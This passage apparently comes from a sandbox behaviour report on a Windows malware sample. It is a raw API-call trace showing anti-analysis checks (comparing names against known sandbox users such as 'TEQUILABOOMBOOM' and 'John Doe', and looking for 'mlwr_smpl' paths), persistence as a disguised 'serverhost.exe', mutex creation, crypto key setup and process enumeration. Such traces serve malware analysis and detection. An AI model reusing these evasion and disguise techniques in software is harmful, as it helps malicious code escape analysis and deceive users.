"c:\\windows\\system32\\rasadhlp.dll") Region: id = 2618 start_va = 0x25c0000 end_va = 0x26bffff entry_point = 0x0 region_type = private name = "private_0x00000000025c0000" filename = "" Region: id = 2619 start_va = 0x71d10000 end_va = 0x71d1ffff entry_point = 0x71d10000 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 2620 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 2621 start_va = 0x71cf0000 end_va = 0x71d01fff entry_point = 0x71cf0000 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 2622 start_va = 0x74ad0000 end_va = 0x74b0bfff entry_point = 0x74ad0000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 2623 start_va = 0x71ce0000 end_va = 0x71ce7fff entry_point = 0x71ce0000 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 2624 start_va = 0x74620000 end_va = 0x74624fff entry_point = 0x74620000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 2625 start_va = 0x74ac0000 end_va = 0x74ac5fff entry_point = 0x74ac0000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 2626 start_va = 0x73240000 end_va = 0x73277fff entry_point = 0x73240000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Thread: id = 106 os_tid = 0x780 [0120.628] GetConsoleCP () returned 0x0 [0120.628] GetMUILanguage () returned 0x0 [0120.628] ConvertFiberToThread () returned 0 [0120.628] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x76bd0000 [0120.629] GetProcAddress (hModule=0x76bd0000, lpProcName="ReleaseCapture") returned 0x76c069f2 [0120.629] ReleaseCapture () returned 1 [0120.629] GetProcAddress (hModule=0x76bd0000, lpProcName="GetProcessWindowStation") returned 0x76bddfdc [0120.629] GetProcessWindowStation () returned 0x30 [0120.629] SHGetFileInfoA (in: pszPath="", dwFileAttributes=0x0, psfi=0x16f628, cbFileInfo=0x160, uFlags=0x4200 | out: psfi=0x16f628) returned 0x1a5ea8 [0120.955] GetProcAddress (hModule=0x76bd0000, lpProcName="GetCaretBlinkTime") returned 0x76be0d01 [0120.955] GetCaretBlinkTime () returned 0x212 [0120.955] LdrGetProcedureAddress (in: BaseAddress=0x76500000, Name="VirtualAlloc", Ordinal=0x0, ProcedureAddress=0x16f31c | out: ProcedureAddress=0x16f31c*=0x76552fb6) returned 0x0 [0120.955] VirtualAlloc (lpAddress=0x0, dwSize=0x12000, flAllocationType=0x1000, flProtect=0x4) returned 0x9b0000 [0120.959] LdrGetProcedureAddress (in: BaseAddress=0x76500000, Name="VirtualAlloc", Ordinal=0x0, ProcedureAddress=0x16f33c | out: ProcedureAddress=0x16f33c*=0x76552fb6) returned 0x0 [0120.959] VirtualAlloc (lpAddress=0x0, dwSize=0xd000, flAllocationType=0x1000, flProtect=0x40) returned 0x410000 [0120.959] LdrGetProcedureAddress (in: BaseAddress=0x76500000, Name="LoadLibraryA", Ordinal=0x0, ProcedureAddress=0x16f41c | out: ProcedureAddress=0x16f41c*=0x7655395c) returned 0x0 [0120.960] LdrGetProcedureAddress (in: BaseAddress=0x76500000, Name="GetProcAddress", Ordinal=0x0, ProcedureAddress=0x16f41c | out: ProcedureAddress=0x16f41c*=0x765533d3) returned 0x0 [0120.960] LdrGetProcedureAddress (in: BaseAddress=0x76500000, Name="VirtualAlloc", Ordinal=0x0, ProcedureAddress=0x16f41c | out: ProcedureAddress=0x16f41c*=0x76552fb6) returned 0x0 [0120.960] LdrGetProcedureAddress (in: BaseAddress=0x76500000, Name="VirtualProtect", Ordinal=0x0, ProcedureAddress=0x16f41c | out: ProcedureAddress=0x16f41c*=0x76542341) returned 0x0 [0120.960] LdrGetProcedureAddress (in: BaseAddress=0x76500000, Name="UnmapViewOfFile", Ordinal=0x0, ProcedureAddress=0x16f41c | out: ProcedureAddress=0x16f41c*=0x7654db13) returned 0x0 [0120.960] LdrGetProcedureAddress (in: BaseAddress=0x76500000, Name="AddVectoredExceptionHandler", Ordinal=0x0, ProcedureAddress=0x16f41c | out: ProcedureAddress=0x16f41c*=0x76eff774) returned 0x0 [0120.960] LdrGetProcedureAddress (in: BaseAddress=0x76500000, Name="RemoveVectoredExceptionHandler", Ordinal=0x0, ProcedureAddress=0x16f41c | out: ProcedureAddress=0x16f41c*=0x76f6ad2e) returned 0x0 [0120.960] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76500000 [0120.960] GetProcAddress (hModule=0x76500000, lpProcName="GetModuleFileNameA") returned 0x765533f6 [0120.960] GetProcAddress (hModule=0x76500000, lpProcName="GetComputerNameA") returned 0x76536ba9 [0120.960] GetProcAddress (hModule=0x76500000, lpProcName="CloseHandle") returned 0x7654ca7c [0120.960] GetProcAddress (hModule=0x76500000, lpProcName="lstrcmpA") returned 0x76538c59 [0120.960] GetProcAddress (hModule=0x76500000, lpProcName="FreeConsole") returned 0x765abfde [0120.961] GetProcAddress (hModule=0x76500000, lpProcName="GetComputerNameExA") returned 0x7658f41f [0120.961] GetProcAddress (hModule=0x76500000, lpProcName="GetModuleHandleA") returned 0x7654cf41 [0120.961] GetProcAddress (hModule=0x76500000, lpProcName="CreateFileA") returned 0x7654cee8 [0120.961] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x75340000 [0120.961] GetProcAddress (hModule=0x75340000, lpProcName="GetUserNameA") returned 0x7536a4b4 [0120.961] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x77060000 [0120.961] GetProcAddress (hModule=0x77060000, lpProcName="StrStrIA") returned 0x7706d250 [0120.961] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x76ef0000 [0120.961] GetProcAddress (hModule=0x76ef0000, lpProcName="strchr") returned 0x76f37690 [0120.962] GetUserNameA (in: lpBuffer=0x16f34c, pcbBuffer=0x16f148 | out: lpBuffer="BGC6u8Oy yXGxkR", pcbBuffer=0x16f148) returned 1 [0120.964] GetComputerNameA (in: lpBuffer=0x16f24c, nSize=0x16f148 | out: lpBuffer="F71GWAT", nSize=0x16f148) returned 1 [0120.965] GetComputerNameExA (in: NameType=0x1, lpBuffer=0x16f14c, nSize=0x16f148 | out: lpBuffer="F71gwat", nSize=0x16f148) returned 1 [0120.965] lstrcmpA (lpString1="F71GWAT", lpString2="TEQUILABOOMBOOM") returned -1 [0120.965] lstrcmpA (lpString1="BGC6u8Oy yXGxkR", lpString2="Wilbert") returned -1 [0120.965] lstrcmpA (lpString1="BGC6u8Oy yXGxkR", lpString2="admin") returned 1 [0120.965] lstrcmpA (lpString1="BGC6u8Oy yXGxkR", lpString2="admin") returned 1 [0120.965] lstrcmpA (lpString1="BGC6u8Oy yXGxkR", lpString2="John Doe") returned -1 [0120.965] lstrcmpA (lpString1="BGC6u8Oy yXGxkR", lpString2="John") returned -1 [0120.965] CreateFileA (lpFileName="C:\\email.doc" (normalized: "c:\\email.doc"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0120.965] CloseHandle (hObject=0xffffffff) returned 0 [0120.965] CreateFileA (lpFileName="C:\\a\\foobar.bmp" (normalized: "c:\\a\\foobar.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0120.965] CloseHandle (hObject=0xffffffff) returned 0 [0120.966] GetModuleHandleA (lpModuleName=0x0) returned 0x9e0000 [0120.966] GetModuleFileNameA (in: hModule=0x9e0000, lpFilename=0x16f35c, nSize=0x103 | out: lpFilename="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exe")) returned 0x47 [0120.966] StrStrIA (lpFirst="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe", lpSrch="sample") returned 0x0 [0120.966] StrStrIA (lpFirst="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe", lpSrch="mlwr_smpl") returned 0x0 [0120.966] StrStrIA (lpFirst="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe", lpSrch="artifact.exe") returned 0x0 [0120.966] VirtualAlloc (lpAddress=0x0, dwSize=0xd000, flAllocationType=0x1000, flProtect=0x4) returned 0x9d0000 [0120.968] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76500000 [0120.968] GetProcAddress (hModule=0x76500000, lpProcName="WTSGetActiveConsoleSessionId") returned 0x7653480b [0120.968] FreeConsole () returned 0 [0120.968] VirtualProtect (in: lpAddress=0x9d1000, dwSize=0x88aa, flNewProtect=0x20, lpflOldProtect=0x16f444 | out: lpflOldProtect=0x16f444*=0x4) returned 1 [0120.968] VirtualProtect (in: lpAddress=0x9da000, dwSize=0xb12, flNewProtect=0x2, lpflOldProtect=0x16f444 | out: lpflOldProtect=0x16f444*=0x4) returned 1 [0120.968] VirtualProtect (in: lpAddress=0x9db000, dwSize=0xbd8, flNewProtect=0x4, lpflOldProtect=0x16f444 | out: lpflOldProtect=0x16f444*=0x4) returned 1 [0120.968] VirtualProtect (in: lpAddress=0x9dc000, dwSize=0x4dc, flNewProtect=0x2, lpflOldProtect=0x16f444 | out: lpflOldProtect=0x16f444*=0x4) returned 1 [0120.968] VirtualProtect (in: lpAddress=0x9d0000, dwSize=0x400, flNewProtect=0x2, lpflOldProtect=0x16f444 | out: lpflOldProtect=0x16f444*=0x4) returned 1 [0123.841] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x16f568, nSize=0x104 | out: lpFilename="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exe")) returned 0x47 [0123.841] _snwprintf (in: _Dest=0x16f770, _Count=0x40, _Format="E%X" | out: _Dest="EA991ED3B") returned 9 [0123.841] _snwprintf (in: _Dest=0x16f7f0, _Count=0x40, _Format="M%X" | out: _Dest="MA991ED3B") returned 9 [0123.841] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="EA991ED3B") returned 0x14c [0123.841] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=1, lpName="MA991ED3B") returned 0x150 [0123.841] GetLastError () returned 0xb7 [0123.841] SetEvent (hEvent=0x14c) returned 1 [0123.842] CloseHandle (hObject=0x14c) returned 1 [0123.842] CloseHandle (hObject=0x150) returned 1 [0123.842] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x75340000 [0123.843] LoadLibraryW (lpLibFileName="ole32.dll") returned 0x76800000 [0123.843] LoadLibraryW (lpLibFileName="shell32.dll") returned 0x75740000 [0123.843] LoadLibraryW (lpLibFileName="crypt32.dll") returned 0x751f0000 [0123.855] LoadLibraryW (lpLibFileName="urlmon.dll") returned 0x76a80000 [0123.872] LoadLibraryW (lpLibFileName="userenv.dll") returned 0x746f0000 [0124.134] LoadLibraryW (lpLibFileName="wininet.dll") returned 0x755a0000 [0124.134] LoadLibraryW (lpLibFileName="wtsapi32.dll") returned 0x73a20000 [0124.140] GetWindowsDirectoryW (in: lpBuffer=0x16f348, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa [0124.140] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x9db27c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x9db27c*=0x78b95e2e, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0124.140] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x9db9c8, nSize=0x104 | out: lpFilename="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exe")) returned 0x47 [0124.140] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x6) returned 0x0 [0124.165] lstrlenA (lpString="agent,app,audio,bio,bits,cache,card,cart,cert,com,crypt,dcom,defrag,device,dhcp,dns,event,evt,flt,gdi,group,help,home,host,info,iso,launch,log,logon,lookup,man,math,mgmt,msi,ncb,net,nv,nvidia,proc,prop,prov,provider,reg,rpc,screen,search,sec,server,service,shed,shedule,spec,srv,storage,svc,sys,system,task,time,video,view,win,window,wlan,wmi") returned 342 [0124.165] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x9db5b8 | out: pszPath="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local") returned 0x0 [0124.166] _snwprintf (in: _Dest=0x9db5b8, _Count=0x104, _Format="%s\\Microsoft\\Windows" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows") returned 56 [0124.166] _snwprintf (in: _Dest=0x9db7c0, _Count=0x104, _Format="%s\\%s.exe" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe") returned 71 [0124.166] CreateFileW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0124.166] CreateFileMappingW (hFile=0x174, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x178 [0124.166] MapViewOfFile (hFileMappingObject=0x178, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x1ca0000 [0124.167] GetFileSize (in: hFile=0x174, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x17000 [0124.167] RtlComputeCrc32 (PartialCrc=0x0, Buffer=0x1ca0000, Length=0x17000) returned 0x5a5d3f39 [0124.169] UnmapViewOfFile (lpBaseAddress=0x1ca0000) returned 1 [0124.170] CloseHandle (hObject=0x178) returned 1 [0124.170] CloseHandle (hObject=0x174) returned 1 [0124.170] GetComputerNameW (in: lpBuffer=0x16f318, nSize=0x16f33c | out: lpBuffer="F71GWAT", nSize=0x16f33c) returned 1 [0124.170] _snprintf (in: _Dest=0x9db2a8, _Count=0x104, _Format="%S_%08X" | out: _Dest="F71GWAT_78B95E2E") returned 16 [0124.171] _snwprintf (in: _Dest=0x16f2b8, _Count=0x40, _Format="Global\\I%X" | out: _Dest="Global\\I78B95E2E") returned 16 [0124.171] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\I78B95E2E") returned 0x174 [0124.171] WaitForSingleObject (hHandle=0x174, dwMilliseconds=0x0) returned 0x0 [0124.171] _snwprintf (in: _Dest=0x16f1b8, _Count=0x40, _Format="Global\\E%X" | out: _Dest="Global\\E78B95E2E") returned 16 [0124.171] _snwprintf (in: _Dest=0x16f238, _Count=0x40, _Format="Global\\M%X" | out: _Dest="Global\\M78B95E2E") returned 16 [0124.171] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\M78B95E2E") returned 0x178 [0124.171] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName="Global\\E78B95E2E") returned 0x17c [0124.171] SignalObjectAndWait (hObjectToSignal=0x17c, hObjectToWaitOn=0x178, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0124.171] ResetEvent (hEvent=0x17c) returned 1 [0124.171] ReleaseMutex (hMutex=0x174) returned 1 [0124.171] CloseHandle (hObject=0x174) returned 1 [0124.171] GetTickCount () returned 0x55fb [0124.171] CreateTimerQueueTimer (in: phNewTimer=0x16f338, TimerQueue=0x0, Callback=0x9d835b, Parameter=0x0, DueTime=0x3e8, Period=0x3e8, Flags=0x10 | out: phNewTimer=0x16f338*=0x1b24b8) returned 1 [0124.171] WaitForSingleObject (hHandle=0x17c, dwMilliseconds=0xffffffff) Thread: id = 107 os_tid = 0x560 Thread: id = 108 os_tid = 0x330 [0125.174] GetTickCount () returned 0x59f1 [0126.172] GetTickCount () returned 0x5dd8 [0126.173] lstrcmpiW (lpString1="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe", lpString2="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe") returned 0 [0127.170] GetTickCount () returned 0x61be [0127.171] CryptAcquireContextW (in: phProv=0x9db284, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000040 | out: phProv=0x9db284*=0x1b2b38) returned 1 [0127.194] CryptDecodeObjectEx (in: dwCertEncodingType=0x10001, lpszStructType=0x13, pbEncoded=0x9d12f8, cbEncoded=0x6a, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x1e3fb00, pcbStructInfo=0x1e3fb04 | out: pvStructInfo=0x1e3fb00, pcbStructInfo=0x1e3fb04) returned 1 [0127.195] CryptImportKey (in: hProv=0x1b2b38, pbData=0x18f960, dwDataLen=0x74, hPubKey=0x0, dwFlags=0x0, phKey=0x9db288 | out: phKey=0x9db288*=0x1b2300) returned 1 [0127.195] LocalFree (hMem=0x18f960) returned 0x0 [0127.196] CryptGenKey (in: hProv=0x1b2b38, Algid=0x660e, dwFlags=0x1, phKey=0x9db28c | out: phKey=0x9db28c*=0x1b2f30) returned 1 [0127.196] CryptCreateHash (in: hProv=0x1b2b38, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x9db290 | out: phHash=0x9db290) returned 1 [0128.169] GetTickCount () returned 0x65a4 [0128.169] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1e3f6bc, nSize=0x104 | out: lpFilename="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exe")) returned 0x47 [0128.169] lstrlenW (lpString="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe") returned 71 [0128.169] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x180 [0128.171] Process32FirstW (in: hSnapshot=0x180, lppe=0x1e3f8c4 | out: lppe=0x1e3f8c4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0128.171] GetCurrentProcessId () returned 0x73c [0128.171] lstrcpyW (in: lpString1=0x1b3304, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0128.171] Process32NextW (in: hSnapshot=0x180, lppe=0x1e3f8c4 | out: lppe=0x1e3f8c4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0128.172] GetCurrentProcessId () returned 0x73c [0128.172] lstrcpyW (in: lpString1=0x1b351c, lpString2="System" | out: lpString1="System") returned="System" [0128.172] Process32NextW (in: hSnapshot=0x180, lppe=0x1e3f8c4 | out: lppe=0x1e3f8c4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0128.172] GetCurrentProcessId () returned 0x73c [0128.172] lstrcpyW (in: lpString1=0x1b3734, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0128.172] Process32NextW (in: hSnapshot=0x180, lppe=0x1e3f8c4 | out: lppe=0x1e3f8c4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0128.173] GetCurrentProcessId () returned 0x73c [0128.173] lstrcpyW (in: lpString1=0x1b394c, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0128.173] Process32NextW (in: hSnapshot=0x180, lppe=0x1e3f8c4 | out: lppe=0x1e3f8c4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0128.173] GetCurrentProcessId () returned 0x73c [0128.173] lstrcpyW (in: lpString1=0x1b3b64, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0128.173] Process32NextW (in: hSnapshot=0x180, lppe=0x1e3f8c4 | out: lppe=0x1e3f8c4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0128.174] GetCurrentProcessId () returned 0x73c [0128.174] Process32NextW (in: hSnapshot=0x180, lppe=0x1e3f8c4 | out: lppe=0x1e3f8c4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0128.174] GetCurrentProcessId () returned 0x73c [0128.174] lstrcpyW (in: lpString1=0x1b3d7c, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0128.174] Process32NextW (in: hSnapshot=0x180, lppe=0x1e3f8c4 | out: lppe=0x1e3f8c4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0128.175] GetCurrentProcessId () returned 0x73c [0128.175] lstrcpyW (in: lpString1=0x1b3f94, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0128.175] Process32NextW (in: hSnapshot=0x180, lppe=0x1e3f8c4 | out: lppe=0x1e3f8c4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0128.175] GetCurrentProcessId () returned 0x73c [0128.175] lstrcpyW (in: lpString1=0x1b41ac, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0128.175] Process32NextW (in: hSnapshot=0x180, lppe=0x1e3f8c4 | out: lppe=0x1e3f8c4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0128.176] GetCurrentProcessId () returned 0x73c [0128.176] lstrcpyW (in: lpString1=0x1b43c4, lpString2="lsm.exe" | out: lpString1="lsm.exe") returned="lsm.exe" [0128.176] Process32NextW (in: hSnapshot=0x180, lppe=0x1e3f8c4 | out: lppe=0x1e3f8c4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.176] GetCurrentProcessId () returned 0x73c [0128.176] lstrcpyW (in: lpString1=0x1b45dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0128.176] Process32NextW (in: hSnapshot=0x180, lppe=0x1e3f8c4 | out: lppe=0x1e3f8c4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.177] GetCurrentProcessId () returned 0x73c [0128.177] Process32NextW (in: hSnapshot=0x180, lppe=0x1e3f8c4 | out: lppe=0x1e3f8c4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.177] GetCurrentProcessId () returned 0x73c [0128.177] Process32NextW (in: hSnapshot=0x180, lppe=0x1e3f8c4 | out: lppe=0x1e3f8c4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.178] GetCurrentProcessId () returned 0x73c [0128.178] Process32NextW (in: hSnapshot=0x180, lppe=0x1e3f8c4 | out: lppe=0x1e3f8c4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.178] GetCurrentProcessId () returned 0x73c [0128.178] Process32NextW (in: hSnapshot=0x180, lppe=0x1e3f8c4 | out: lppe=0x1e3f8c4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0128.179] GetCurrentProcessId () returned 0x73c [0128.179] lstrcpyW (in: lpString1=0x1b47f4, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0128.179] Process32NextW (in: hSnapshot=0x180, lppe=0x1e3f8c4 | out: lppe=0x1e3f8c4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.179] GetCurrentProcessId () returned 0x73c [0128.179] Process32NextW (in: hSnapshot=0x180, lppe=0x1e3f8c4 | out: lppe=0x1e3f8c4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x444, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.180] GetCurrentProcessId () returned 0x73c [0128.180] Process32NextW (in: hSnapshot=0x180, lppe=0x1e3f8c4 | out: lppe=0x1e3f8c4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0128.180] GetCurrentProcessId () returned 0x73c [0128.180] lstrcpyW (in: lpString1=0x1b4a0c, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0128.180] Process32NextW (in: hSnapshot=0x180, lppe=0x1e3f8c4 | out: lppe=0x1e3f8c4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.181] GetCurrentProcessId () returned 0x73c [0128.181] Process32NextW (in: hSnapshot=0x180, lppe=0x1e3f8c4 | out: lppe=0x1e3f8c4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1dc, 